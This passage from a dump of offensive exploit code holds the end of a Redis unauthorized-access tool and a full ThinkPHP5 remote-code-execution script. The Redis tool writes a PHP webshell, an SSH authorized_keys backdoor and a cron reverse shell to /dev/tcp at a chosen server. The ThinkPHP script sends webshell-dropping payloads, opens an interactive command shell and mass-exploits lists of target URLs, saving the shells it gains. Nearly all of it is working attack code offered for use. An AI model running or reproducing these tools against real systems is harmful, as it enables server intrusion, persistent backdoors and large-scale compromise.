132 | self.bash() 133 | else: 134 | print("Sorry,I Dont't Know!") 135 | 136 | def send(self,content): 137 | self.Socket.send(content) 138 | print("[+]:{}".format(content.decode("UTF-8"))) 139 | res = self.Socket.recv(self.BUFSIZ) 140 | print(res.decode("UTF-8")) 141 | 142 | def write(self,dir,dbfilename,payload): 143 | dirtemp = input("Please select the writing dir, otherwise the default:") 144 | if dirtemp: 145 | dir = dirtemp 146 | self.send(bytes("config set dir {}\n".format(dir), encoding="UTF-8")) 147 | else: 148 | self.send(bytes("config set dir {}\n".format(dir), encoding="UTF-8")) 149 | 150 | dbfilenametemp = input("Please select the writing dbfilename, otherwise the default:") 151 | if dbfilenametemp: 152 | dbfilename = dbfilenametemp 153 | self.send(bytes("config set dbfilename {}\n".format(dbfilename), encoding="UTF-8")) 154 | else: 155 | self.send(bytes("config set dbfilename {}\n".format(dbfilename), encoding="UTF-8")) 156 | 157 | payloadtemp = input("Please select the writing payload, otherwise the default:") 158 | if payloadtemp: 159 | payload = payloadtemp 160 | self.send(bytes('set payload {}\n'.format(payload), 
encoding="UTF-8")) 161 | else: 162 | self.send(bytes('set payload {}\n'.format(payload), encoding="UTF-8")) 163 | self.send(b"save\n") 164 | 165 | def Webshell(self): 166 | payload = '"<?php phpinfo(); ?>"' 167 | dbfilename = 'trojan.php' 168 | dir = '/var/www/html/' 169 | self.write(dir=dir,dbfilename=dbfilename,payload=payload) 170 | 171 | def ssh(self): 172 | while True: 173 | path = input("input your ssh id_rsa.pub path or exit:") 174 | if path=='exit': 175 | sys.exit("God bye!!") 176 | elif os.path.isfile(path): 177 | with open(path,'r') as file: 178 | id_rsa_pub = file.readline().rstrip('\n') 179 | break 180 | else: 181 | print("this path {} is not found!".format(path)) 182 | 183 | payload = r'"\n\n\n\{}\n\n\n"'.format(id_rsa_pub) 184 | dbfilename = 'authorized_keys' 185 | dir = '/root/.ssh/' 186 | self.write(dir=dir, dbfilename=dbfilename, payload=payload) 187 | 188 | def bash(self): 189 | while True: 190 | addr = input("input your server addr or exit:") 191 | port = input("input your server port or exit:") 192 | if addr=='exit' or port=='exit': 193 | sys.exit("Good bye!!!") 194 | elif addr and port: 195 | print("your server addr and port is {}:{}".format(addr,port)) 196 | break 197 | 198 | payload = r'"\n\n\n* * * * * bash -i >& /dev/tcp/{}/{} 0>&1\n\n\n"'.format(addr,port) 199 | dbfilename = 'root' 200 | dir = '/var/spool/cron/' 201 | self.write(dir=dir,dbfilename=dbfilename,payload=payload) 202 | 203 | if __name__ == '__main__': 204 | Banner() 205 | shell = Shell() 206 | 207 | -------------------------------------------------------------------------------- /thinkphp5/tp5-getshell/tp5-getshell.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | #Author:LSA 3 | #Description: thinkphp5 rce getshell 4 | #Date:20181211 5 | 6 | import requests 7 | import optparse 8 | import os 9 | import datetime 10 | import Queue 11 | import threading 12 | import sys 13 | from bs4 import BeautifulSoup 14 | from 
requests.packages import urllib3 15 | 16 | reload(sys) 17 | sys.setdefaultencoding('utf-8') 18 | 19 | lock = threading.Lock() 20 | 21 | q0 = Queue.Queue() 22 | threadList = [] 23 | global succ 24 | succ = 0 25 | headers = {} 26 | headers["User-Agent"] = 'Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11' 27 | 28 | 29 | poc0 = '/index.php/?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1' 30 | poc1 = '/index.php/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1' 31 | poc2 = '/index.php/?s=index/\\think\Request/input&filter=phpinfo&data=1' 32 | poc3 = '/index.php?s=/index/\\think\\request/cache&key=1|phpinfo' 33 | poclist = [poc0,poc1,poc2,poc3] 34 | 35 | exp0 = '/index.php/?s=index/\\think\\template\driver\\file/write&cacheFile=zxc0.php&content=<?php @eval($_POST[xxxxxx]);?>' 36 | exp1 = '/index.php/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=zxc1.php&vars[1][]=<?php @eval($_POST[xxxxxx]);?>' 37 | exp2 = '/index.php/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo \'<?php @eval($_POST[xxxxxx]);?>\'>zxc2.php' 38 | 39 | explist = [exp0,exp1,exp2] 40 | 41 | cmdtest = 'echo zxc000' 42 | cmdexp0 = '/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[l][]={}' 43 | cmdexp1 = '/index.php?s=index/\\think\Request/input&filter=system&data={}' 44 | cmdexp2 = '/index.php?s=/index/\\think\\request/cache&key={}|system' 45 | cmdexp3 = '/index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]={}' 46 | 47 | cmdlist = [cmdexp0,cmdexp1,cmdexp2,cmdexp3] 48 | 49 | 50 | 51 | def tp5_getshell_check(tgtUrl,timeout): 52 | 53 | for p in range(len(poclist)): 54 | 55 | 56 | fullUrl = tgtUrl + poclist[p] 57 | #print fullUrl 58 | try: 59 | rst = 
requests.get(fullUrl,headers=headers,timeout=timeout,verify=False) 60 | except requests.exceptions.Timeout: 61 | print 'phpinfo checked fail! Error: Timeout' 62 | continue 63 | except requests.exceptions.ConnectionError: 64 | print 'phpinfo checked fail! Error: ConnectionError' 65 | continue 66 | except: 67 | print 'phpinfo checked fail! Error: Unkonwn error0' 68 | continue 69 | 70 | if rst.status_code == 200: 71 | 72 | if(rst.text.index('PHP Version')): 73 | print 'phpinfo checked success! poc' + str(p) + ': ' + poclist[p] + '\n' 74 | 75 | else: 76 | soup = BeautifulSoup(rst.text,'lxml') 77 | if(soup.find('title')): 78 | print 'Poc' + str(p) + ' phpinfo checked fail! Error title: ' + str(soup.title.string) + '\n' 79 | else: 80 | print 'Poc' + str(p) + ' phpinfo checked fail! ' + str(rst.text[0:11]) + '\n' 81 | 82 | else: 83 | print 'Poc' + str(p) + ' phpinfo checked fail! status code: ' + str(rst.status_code) + '\n' 84 | continue 85 | 86 | def tp5_getshell_cmdshell(tgtUrl,timeout): 87 | for c in range(len(cmdlist)): 88 | fullUrl = tgtUrl + cmdlist[c].format(cmdtest) 89 | #print fullUrl 90 | try: 91 | rst = requests.get(fullUrl,headers=headers,timeout=timeout,verify=False) 92 | #print rst.text 93 | 94 | if rst.status_code == 200: 95 | if 'zxc000' in rst.text: 96 | print 'Getshell cmd success! now use cmdexp' + str(c) + ': ' + cmdlist[c] + '\n' 97 | while True: 98 | command = raw_input("cmd>>> ") 99 | if command == 'exit': 100 | break 101 | 102 | cmdexp = cmdlist[c].format(command) 103 | fullUrl1 = tgtUrl + cmdexp 104 | cmdResult = requests.get(fullUrl1,headers=headers,timeout=7) 105 | print cmdResult.text 106 | break 107 | 108 | else: 109 | print 'Cmdshell' + str(c) + ' checked fail! status code: ' + str(rst.status_code) + '\n' 110 | continue 111 | 112 | 113 | except requests.exceptions.Timeout: 114 | #print 'Getcmdshell fail! Error: Timeout' 115 | continue 116 | except requests.exceptions.ConnectionError: 117 | #print 'Getcmdshell fail! 
Error: ConnectionError' 118 | continue 119 | except: 120 | #print 'Getcmdshell fail! Error: Unkonwn error0' 121 | continue 122 | 123 | 124 | 125 | print 'Over' 126 | 127 | def tp5_getshell_exploit(tgtUrl,timeout): 128 | 129 | for e in range(len(explist)): 130 | 131 | fullUrl = tgtUrl + explist[e] 132 | #print fullUrl 133 | try: 134 | rst = requests.get(fullUrl,headers=headers,timeout=timeout,verify=False) 135 | except requests.exceptions.Timeout: 136 | print 'Getshell exploited fail! Error: Timeout' 137 | continue 138 | except requests.exceptions.ConnectionError: 139 | print 'Getshell exploited fail! Error: ConnectionError' 140 | continue 141 | except: 142 | print 'Getshell exploited fail! Error: Unkonwn error0' 143 | continue 144 | 145 | if rst.status_code == 200: 146 | 147 | rst1 = requests.get(tgtUrl+'/zxc'+str(e)+'.php',timeout=timeout,verify=False) 148 | if rst1.status_code == 200: 149 | if rst1.text == '': 150 | print 'Getshell! ' + tgtUrl + '/zxc' + str(e) + '.php|pwd:xxxxxx' + '\n' 151 | exit() 152 | else: 153 | soup = BeautifulSoup(rst1.text,'lxml') 154 | if(soup.find('title')): 155 | print 'Exp' + str(e) + ' getshell exploited fail! Error title: ' + str(soup.title.string) + '\n' 156 | else: 157 | print 'Exp' + str(e) + ' getshell exploited fail! ' + str(rst1.text[0:11]) + '\n' 158 | else: 159 | 160 | print 'Exp' + str(e) + ' getshell exploited fail! Shell status code: ' + str(rst1.status_code) + '\n' 161 | else: 162 | 163 | print 'Exp' + str(e) + ' getshell exploited fail! 
status code: ' + str(rst.status_code) + '\n' 164 | 165 | 166 | def tp5_getshell_batch(timeout,f4success): 167 | urllib3.disable_warnings() 168 | global countLines 169 | while(not q0.empty()): 170 | 171 | tgtUrl = q0.get() 172 | for e in range(len(explist)): 173 | 174 | fullUrl = tgtUrl + explist[e] 175 | #print fullUrl 176 | qcount = q0.qsize() 177 | print 'Checking: ' + fullUrl + '---[' + str(countLines - qcount) + '/' + str(countLines) + ']' 178 | 179 | try: 180 | rst = requests.get(fullUrl,headers=headers,timeout=timeout,verify=False) 181 | 182 | except requests.exceptions.Timeout: 183 | #print 'Getshell failed! Error: Timeout' 184 | 185 | continue 186 | 187 | except requests.exceptions.ConnectionError: 188 | #print 'Getshell failed! Error: ConnectionError' 189 | 190 | continue 191 | 192 | except: 193 | #print 'Getshell failed! Error: Unkonwn error' 194 | 195 | continue 196 | 197 | if rst.status_code == 200: 198 | try: 199 | rst1 = requests.get(tgtUrl+'/zxc'+str(e)+'.php',timeout=timeout,verify=False) 200 | 201 | if rst1.status_code == 200: 202 | 203 | 204 | if rst1.text == '': 205 | shellAddr = tgtUrl + '/zxc' + str(e) + '.php|pwd:xxxxxx' 206 | print 'Getshell! ' + shellAddr 207 | lock.acquire() 208 | f4success.write('shell: '+shellAddr+'\n') 209 | lock.release() 210 | global succ 211 | succ = succ + 1 212 | break 213 | else: 214 | continue 215 | else: 216 | 217 | #errorState = 'Getshell failed! Error: zxc.php' + str(e) + ' ' + str(rst1.status_code) 218 | continue 219 | 220 | except requests.exceptions.Timeout: 221 | #print 'Getshell failed! Error: Timeout' 222 | 223 | continue 224 | 225 | except requests.exceptions.ConnectionError: 226 | #print 'Getshell failed! Error: ConnectionError' 227 | 228 | continue 229 | 230 | except: 231 | #print 'Getshell failed! Error: Unkonwn error' 232 | 233 | continue 234 | 235 | 236 | 237 | else: 238 | #print 'Getshell failed! 
status code: ' + str(rst.status_code) 239 | 240 | continue 241 | 242 | 243 | 244 | 245 | if __name__ == '__main__': 246 | 247 | print ''' 248 | **************************************************** 249 | * thinkphp5 rce getshell(controller) * 250 | * Coded by LSA * 251 | **************************************************** 252 | ''' 253 | 254 | parser = optparse.OptionParser('python %prog ' +'-h (manual)',version='%prog v1.0') 255 | 256 | parser.add_option('-u', dest='tgtUrl', type='string', help='single url') 257 | 258 | parser.add_option('-f', dest='tgtUrlsPath', type ='string', help='urls filepath[exploit default]') 259 | 260 | parser.add_option('-s', dest='timeout', type='int', default=7, help='timeout(seconds)') 261 | 262 | parser.add_option('-t', dest='threads', type='int', default=5, help='the number of threads') 263 | 264 | #parser.add_option('--check', dest='check',action='store_true', help='check url but not exploit[default]') 265 | 266 | parser.add_option('--exploit', dest='exploit',action='store_true', help='exploit url') 267 | 268 | parser.add_option('--cmdshell', dest='cmdshell',action='store_true', help='cmd shell mode') 269 | 270 | (options, args) = parser.parse_args() 271 | 272 | #check = options.check 273 | 274 | exploit = options.exploit 275 | 276 | cmdshell = options.cmdshell 277 | 278 | timeout = options.timeout 279 | 280 | tgtUrl = options.tgtUrl 281 | 282 | if tgtUrl and (exploit is None and cmdshell is None): 283 | 284 | tp5_getshell_check(tgtUrl,timeout) 285 | 286 | if tgtUrl and exploit: 287 | 288 | tp5_getshell_exploit(tgtUrl,timeout) 289 | 290 | if tgtUrl and cmdshell: 291 | 292 | tp5_getshell_cmdshell(tgtUrl,timeout) 293 | 294 | 295 | if options.tgtUrlsPath: 296 | tgtFilePath = options.tgtUrlsPath 297 | threads = options.threads 298 | nowtime = datetime.datetime.now().strftime('%Y%m%d%H%M%S') 299 | os.mkdir('batch_result/'+str(nowtime)) 300 | f4success = open('batch_result/'+str(nowtime)+'/'+'success.txt','w') 301 | #f4fail = 
open('batch_result/'+str(nowtime)+'/'+'fail.txt','w') 302 | urlsFile = open(tgtFilePath) 303 | global countLines 304 | countLines = len(open(tgtFilePath,'rU').readlines()) 305 | 306 | print '===Total ' + str(countLines) + ' urls===' 307 | 308 | for urls in urlsFile: 309 | fullUrls = urls.strip() 310 | q0.put(fullUrls) 311 | for thread in range(threads): 312 | t = threading.Thread(target=tp5_getshell_batch,args=(timeout,f4success)) 313 | t.start() 314 | threadList.append(t) 315 | for th in threadList: 316 | th.join() 317 | 318 | 319 | print '\n###Finished! [success/total]: ' + '[' + str(succ) + '/' + str(countLines) + ']###' 320 | print 'Results were saved in ./batch_result/' + str(nowtime) + '/' 321 | f4success.close() 322 | #f4fail.close() 323 | --------------------------------------------------------------------------------